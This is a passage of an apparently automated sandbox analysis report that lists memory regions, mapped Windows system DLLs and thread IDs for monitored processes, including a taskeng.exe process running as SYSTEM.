entry_point = 0x0 region_type = private name = "private_0x000000d39cc00000" filename = "" Region: id = 1502 start_va = 0xd39cd00000 end_va = 0xd39cdfffff entry_point = 0x0 region_type = private name = "private_0x000000d39cd00000" filename = "" Region: id = 1503 start_va = 0xd39ce00000 end_va = 0xd39cefffff entry_point = 0x0 region_type = private name = "private_0x000000d39ce00000" filename = "" Region: id = 1504 start_va = 0xd39cf00000 end_va = 0xd39cffffff entry_point = 0x0 region_type = private name = "private_0x000000d39cf00000" filename = "" Region: id = 1505 start_va = 0xd39d000000 end_va = 0xd39d336fff entry_point = 0xd39d000000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1506 start_va = 0xd39d340000 end_va = 0xd39d3bffff entry_point = 0x0 region_type = private name = "private_0x000000d39d340000" filename = "" Region: id = 1507 start_va = 0xd39d3c0000 end_va = 0xd39d4bffff entry_point = 0x0 region_type = private name = "private_0x000000d39d3c0000" filename = "" Region: id = 1508 start_va = 0xd39d4c0000 end_va = 0xd39d5bffff entry_point = 0x0 region_type = private name = "private_0x000000d39d4c0000" filename = "" Region: id = 1509 start_va = 0xd39d600000 end_va = 0xd39d6fffff entry_point = 0x0 region_type = private name = "private_0x000000d39d600000" filename = "" Region: id = 1510 start_va = 0xd39d700000 end_va = 0xd39d792fff entry_point = 0xd39d700000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1511 start_va = 0xd39d7a0000 end_va = 0xd39d89ffff entry_point = 0x0 region_type = private name = "private_0x000000d39d7a0000" filename = "" Region: id = 1512 start_va = 0xd39d900000 end_va = 0xd39d9fffff entry_point = 0x0 region_type = private name = "private_0x000000d39d900000" filename = "" Region: id = 1513 start_va = 0xd39da00000 end_va = 0xd39dafffff entry_point = 0x0 region_type = private name = "private_0x000000d39da00000" filename = "" Region: id = 1514 start_va = 0xd39db00000 end_va = 0xd39dbfffff entry_point = 0x0 region_type = private name = "private_0x000000d39db00000" filename = "" Region: id = 1515 start_va = 0xd39dc00000 end_va = 0xd39dcfffff entry_point = 0x0 region_type = private name = "private_0x000000d39dc00000" filename = "" Region: id = 1516 start_va = 0xd39dd00000 end_va = 0xd39ddfffff entry_point = 0x0 region_type = private name = "private_0x000000d39dd00000" filename = "" Region: id = 1517 start_va = 0xd39de00000 end_va = 0xd39defffff entry_point = 0x0 region_type = private name = "private_0x000000d39de00000" filename = "" Region: id = 1518 start_va = 0xd39df00000 end_va = 0xd39df7ffff entry_point = 0x0 region_type = private name = "private_0x000000d39df00000" filename = "" Region: id = 1519 start_va = 0xd39df80000 end_va = 0xd39dfeffff entry_point = 0xd39df80000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1520 start_va = 0xd39e000000 end_va = 0xd39e0fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e000000" filename = "" Region: id = 1521 start_va = 0xd39e200000 end_va = 0xd39e2fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e200000" filename = "" Region: id = 1522 start_va = 0xd39e400000 end_va = 0xd39e4fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e400000" filename = "" Region: id = 1523 start_va = 0xd39e580000 end_va = 0xd39e67ffff entry_point = 0x0 region_type = private name = "private_0x000000d39e580000" filename = "" Region: id = 1524 start_va = 0xd39e700000 end_va = 0xd39e7fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e700000" filename = "" Region: id = 1525 start_va = 0xd39e800000 end_va = 0xd39e8fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e800000" filename = "" Region: id = 1526 start_va = 0xd39e900000 end_va = 0xd39e9fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e900000" filename = "" Region: id = 1527 start_va = 0xd39eb00000 end_va = 0xd39ebfffff entry_point = 0x0 region_type = private name = "private_0x000000d39eb00000" filename = "" Region: id = 1528 start_va = 0xd39ec00000 end_va = 0xd39ecfffff entry_point = 0x0 region_type = private name = "private_0x000000d39ec00000" filename = "" Region: id = 1529 start_va = 0xd39ee00000 end_va = 0xd39eefffff entry_point = 0x0 region_type = private name = "private_0x000000d39ee00000" filename = "" Region: id = 1530 start_va = 0x7df5ff0b0000 end_va = 0x7ff5ff0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0b0000" filename = "" Region: id = 1531 start_va = 0x7ff786f48000 end_va = 0x7ff786f49fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f48000" filename = "" Region: id = 1532 start_va = 0x7ff786f4a000 end_va = 0x7ff786f4bfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f4a000" filename = "" Region: id = 1533 start_va = 0x7ff786f4e000 end_va = 0x7ff786f4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f4e000" filename = "" Region: id = 1534 start_va = 0x7ff786f56000 end_va = 0x7ff786f57fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f56000" filename = "" Region: id = 1535 start_va = 0x7ff786f58000 end_va = 0x7ff786f59fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f58000" filename = "" Region: id = 1536 start_va = 0x7ff786f5a000 end_va = 0x7ff786f5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f5a000" filename = "" Region: id = 1537 start_va = 0x7ff786f5c000 end_va = 0x7ff786f5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f5c000" filename = "" Region: id = 1538 start_va = 0x7ff786f5e000 end_va = 0x7ff786f5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f5e000" filename = "" Region: id = 1539 start_va = 0x7ff786f60000 end_va = 0x7ff786f61fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f60000" filename = "" Region: id = 1540 start_va = 0x7ff786f62000 end_va = 0x7ff786f63fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f62000" filename = "" Region: id = 1541 start_va = 0x7ff786f64000 end_va = 0x7ff786f65fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f64000" filename = "" Region: id = 1542 start_va = 0x7ff786f66000 end_va = 0x7ff786f67fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f66000" filename = "" Region: id = 1543 start_va = 0x7ff786f68000 end_va = 0x7ff786f69fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f68000" filename = "" Region: id = 1544 start_va = 0x7ff786f6a000 end_va = 0x7ff786f6bfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f6a000" filename = "" Region: id = 1545 start_va = 0x7ff786f6c000 end_va = 0x7ff786f6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f6c000" filename = "" Region: id = 1546 start_va = 0x7ff786f6e000 end_va = 0x7ff786f6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f6e000" filename = "" Region: id = 1547 start_va = 0x7ff786f70000 end_va = 0x7ff78706ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff786f70000" filename = "" Region: id = 1548 start_va = 0x7ff787070000 end_va = 0x7ff787092fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787070000" filename = "" Region: id = 1549 start_va = 0x7ff787093000 end_va = 0x7ff787093fff entry_point = 0x0 region_type = private name = "private_0x00007ff787093000" filename = "" Region: id = 1550 start_va = 0x7ff787094000 end_va = 0x7ff787095fff entry_point = 0x0 region_type = private name = "private_0x00007ff787094000" filename = "" Region: id = 1551 start_va = 0x7ff787096000 end_va = 0x7ff787097fff entry_point = 0x0 region_type = private name = "private_0x00007ff787096000" filename = "" Region: id = 1552 start_va = 0x7ff78709a000 end_va = 0x7ff78709bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78709a000" filename = "" Region: id = 1553 start_va = 0x7ff78709e000 end_va = 0x7ff78709ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78709e000" filename = "" Region: id = 1554 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1555 start_va = 0x7ffade0d0000 end_va = 0x7ffade259fff entry_point = 0x7ffade0d0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1556 start_va = 0x7ffadf470000 end_va = 0x7ffadf49ffff entry_point = 0x7ffadf470000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1557 start_va = 0x7ffae0a60000 end_va = 0x7ffae0aa2fff entry_point = 0x7ffae0a60000 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 1558 start_va = 0x7ffae1490000 end_va = 0x7ffae1514fff entry_point = 0x7ffae1490000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1559 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1560 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1561 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1562 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1563 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1564 start_va = 0x7ffaf07e0000 end_va = 0x7ffaf07edfff entry_point = 0x7ffaf07e0000 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 1565 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1566 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1567 start_va = 0x7ffaf0830000 end_va = 0x7ffaf0865fff entry_point = 0x7ffaf0830000 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 1568 start_va = 0x7ffaf0870000 end_va = 0x7ffaf0907fff entry_point = 0x7ffaf0870000 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 1569 start_va = 0x7ffaf09e0000 end_va = 0x7ffaf0a27fff entry_point = 0x7ffaf09e0000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1570 start_va = 0x7ffaf0a30000 end_va = 0x7ffaf0a8cfff entry_point = 0x7ffaf0a30000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1571 start_va = 0x7ffaf0ac0000 end_va = 0x7ffaf0acafff entry_point = 0x7ffaf0ac0000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1572 start_va = 0x7ffaf0ad0000 end_va = 0x7ffaf0ad7fff entry_point = 0x7ffaf0ad0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1573 start_va = 0x7ffaf0ae0000 end_va = 0x7ffaf0bf0fff entry_point = 0x7ffaf0ae0000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1574 start_va = 0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1575 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1576 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1577 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1578 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1579 start_va = 0x7ffaf1950000 end_va = 0x7ffaf1958fff entry_point = 0x7ffaf1950000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1580 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1581 start_va = 0x7ffaf19a0000 end_va = 0x7ffaf19a9fff entry_point = 0x7ffaf19a0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1582 start_va = 0x7ffaf19b0000 end_va = 0x7ffaf1b5afff entry_point = 0x7ffaf19b0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1583 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1584 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1585 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1586 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1587 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1588 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1589 start_va = 0x7ffaf3490000 end_va = 0x7ffaf349bfff entry_point = 0x7ffaf3490000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1590 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1591 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1592 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1593 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1594 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1595 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1596 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1597 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1598 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1599 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1600 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1601 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1602 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1603 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1604 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1605 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1606 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1607 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1608 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1609 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1610 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1611 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1612 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1613 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1614 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1615 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1616 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1617 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1618 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1619 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1620 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1621 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1622 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 147 os_tid = 0xe58 Thread: id = 148 os_tid = 0xe74 Thread: id = 149 os_tid = 0xf38 Thread: id = 150 os_tid = 0xb20 Thread: id = 151 os_tid = 0xbe8 Thread: id = 152 os_tid = 0x78c Thread: id = 153 os_tid = 0x384 Thread: id = 154 os_tid = 0x378 Thread: id = 155 os_tid = 0x8 Thread: id = 156 os_tid = 0x27c Thread: id = 157 os_tid = 0x254 Thread: id = 158 os_tid = 0x250 Thread: id = 159 os_tid = 0x128 Thread: id = 160 os_tid = 0x3dc Thread: id = 161 os_tid = 0x3b8 Thread: id = 162 os_tid = 0x3b4 Thread: id = 163 os_tid = 0x3b0 Thread: id = 164 os_tid = 0x39c Thread: id = 165 os_tid = 0x38c Thread: id = 166 os_tid = 0x344 Process: id = "9" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x22b1a000" os_pid = "0xf64" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x318" cmd_line = "taskeng.exe {688F87E5-5768-45AC-8D88-0682FAC43AA8} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1625 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1626 start_va = 0x8d78000000 end_va = 0x8d7801ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78000000" filename = "" Region: id = 1627 start_va = 0x8d78020000 end_va = 0x8d78033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d78020000" filename = "" Region: id = 1628 start_va = 0x8d78040000 end_va = 0x8d780bffff entry_point = 0x0 region_type = private name = "private_0x0000008d78040000" filename = "" Region: id = 1629 start_va = 0x8d780c0000 end_va = 0x8d780c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d780c0000" filename = "" Region: id = 1630 start_va = 0x8d780d0000 end_va = 